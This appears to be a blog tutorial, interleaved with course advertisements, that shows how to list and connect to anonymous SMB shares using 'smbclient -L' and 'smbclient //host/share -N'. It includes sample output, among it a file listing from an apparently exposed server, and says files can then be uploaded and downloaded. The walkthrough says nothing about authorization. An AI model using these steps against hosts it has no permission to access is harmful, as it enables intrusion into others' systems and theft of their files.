Exploiting Poor SMB Configuration

What’s an SMB?

SMB, which stands for Server Message Block, is a protocol for sharing files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers.

SMB is a client-server, request-response protocol. The only exception to the request-response nature of SMB (that is, where the client makes requests and the server sends back responses), is when the client has requested opportunistic locks (oplocks) and the server, subsequently, has to break an already granted oplock because another client has requested a file open with a mode that’s incompatible with the granted oplock. In this case, the server sends an unsolicited message to the client signalling the oplock break.

ENROLL IN THE LINUX FOUNDATION LFC210 – FUNDAMENTALS OF PROFESSIONAL OPEN SOURCE MANAGEMENT TODAY! $179

Servers make file systems and other resources (printers, mailslots, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.

(Samba.org)

 

Exploiting Badly Configured SMB’S

What you’ll need:

  1. A machine that can run smbclient command
  2. A vulnerable/poorly configured SMB machine (remote or local)
  3. SMB PORT: 445

Computer network

Steps:
Check Sharenames

To view smb share names use the command:
smbclient -L 192.168.25.1 -N
(192.168.25.1 = ip of vulnerable smb)

ENROLL TODAY IN THE DevOps Fundamentals: Implementing Continuous Delivery SELF PACED COURSE! $199

You’ll get something like this:

`WARNING: The “syslog” option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

Sharename Type Comment
——— —- ——-
arquivos     Disk
IPC$           IPC IPC Service (Samba Server 4.3.9-Ubuntu)
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

Server Comment
——— ——-
SAMBA Samba Server 4.3.9-Ubuntu

Workgroup Master
——— ——-
COMPUTACAO SAMBA
`
After doing that, you’ll need to pick a Sharename. For example “arquivos” or “IPC$”. I highly recommend you to pick one that doesn’t have the symbol “$”, because it’s easy to get one with permissions.

$199 ENROLLS YOU INTO THE CONTAINERS FOR DEVELOPERS AND QUALITY ASSURANCE COURSE (LFS254)!

In this case, I’m going to pick “arquivos” as Sharename.

Finally:

smbclient //192.168.25.1/arquivos -N

And, that’s pretty much it…
Now, if your host is totally vulnerable, you can upload files, download files, etc.

EX:
`
WARNING: The “syslog” option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu] smb: > ls
. D 0 Tue Jul 19 09:12:48 2016
.. D 0 Fri May 22 09:25:21 2015
html D 0 Fri Jul 15 03:48:38 2016
codeigniter D 0 Fri Jul 3 17:00:48 2015
serverconfig.php A 100402 Fri Jul 15 03:48:46 2016
phpmyadmin D 0 Fri May 22 16:28:47 2015
khy AR 0 Tue Jul 19 09:12:48 2016
cgitelnet1 D 0 Fri Jul 15 05:40:41 2016
supp1.1 D 0 Tue Jul 7 19:35:09 2015
index.html N 142 Tue May 10 16:30:59 2016
teste.php A 21 Fri May 22 11:56:35 2015
enxjdf.exe N 571074 Mon Apr 14 16:06:33 2008
cherno.php N 210752 Fri Jul 15 05:13:46 2016

151380148 blocks of size 1024. 132224492 blocks available
smb: >
`

SPEND $199 AND ENROLL IN OUR SELF PACED CONTAINERS FUNDAMENTALS COURSE (LFS253)!

You can view all the smbclient commands by typing “?”

`smb: > ?
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del dir du
echo exit get getfacl geteas
hardlink help history iosize lcd
link lock lowercase ls l
mask md mget mkdir more
mput newer notify open posix
posix_encrypt posix_open posix_mkdir posix_rmdir posix_unlink
print prompt put pwd q
queue quit readlink rd recurse
reget rename reput rm rmdir
showacls setea setmode scopy stat
symlink tar tarmode timeout translate
unlock volume vuid wdel logon
listconnect showconnect tcon tdis tid
logoff .. !
`


A Python script that does all the hard work; if you want, you can get it here.

By:                                                                      Kl4us

Full article@

1 Comment

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.